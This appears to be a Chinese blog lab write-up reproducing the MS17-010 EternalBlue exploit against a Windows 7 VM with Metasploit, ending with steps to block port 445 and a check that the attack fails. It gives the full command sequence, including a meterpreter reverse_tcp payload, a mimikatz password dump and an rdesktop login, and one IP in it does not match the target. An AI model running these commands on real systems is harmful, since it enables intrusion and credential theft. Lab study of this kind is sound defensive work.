admin管理员组

文章数量:1516870

二、环境搭建
测试环境:攻击机:kail(192.168.132.132)
靶机:win7 x64(192.168.132.128)
虚拟机:VMware workstation
2.1 利用VMware workstation搭建MS17_010漏洞环境
1)为保证虚拟机下的win7和kail能互相ping通,要做2步

第一步:虚拟机下的win7和kail都设置为桥接模式

第二步:把win7的防火墙关了:控制面板-系统和安全-windows防火墙-打开或关闭windows防火墙

2) 为保证虚拟机下的win7的445端口打开

三、漏洞复现
利用kail的msf进行攻击。
3.1 启动msf
root@kali:~# msfconsole

3.2 寻找ms17_010漏洞

msf5 > search ms17_010

msf5 > use 2【利用2漏洞】
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options【显示配置】

3.3 配置【目标地址RHOST】【PAYLOAD】【本地地址LHOST】
msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOST 192.168.132.128
msf5 exploit(windows/smb/ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.132.132

四、攻击

4.1 利用meterpreter进行攻击
查看权限:meterpreter > getuid

桌面截图:meterpreter > screenshot

4.2拿到对方系统所有用户的用户名/密码,只需2步
第一步:用meterpreter中的mimikatz模块密码
meterpreter > load mimikatz

第二步:获取用户密码
meterpreter > wdigest

4.3.远程桌面连接,另起终端,可以在对方主机上做任何事
root@kali:~# rdesktop 192.168.132.133 -u xuanxi -p 123456

五、加固后检查
使用策略封闭445端口进行抵御
5.1 加固
1.win7 ctrl+R打开运行窗口,输入gpedit打开本地安全策略

2.计算机配置–windows设置–安全设置–IP安全策略

3.右键创建新安全策略,一直下一步,直到IP筛选列表

4. 一直下一步,直到以下这一步,点击“添加”

  1. 一直点下一步,直到以下这一步,目标地址,选择“我的IP地址”

6.选择协议类型,“tcp”

7.一直下一步,直到以下这一步,端口“445”

8.一直下一步,直到“完成”,列表上会新加一行

9.把刚才加的添加上

10.一直点下一步,直到以下,选择“阻止”

11.完成,然后右击,选择“分配”

5.2检查
再用msf攻击一遍

攻击失败,升级成功。

本文标签: 利用一直下一编程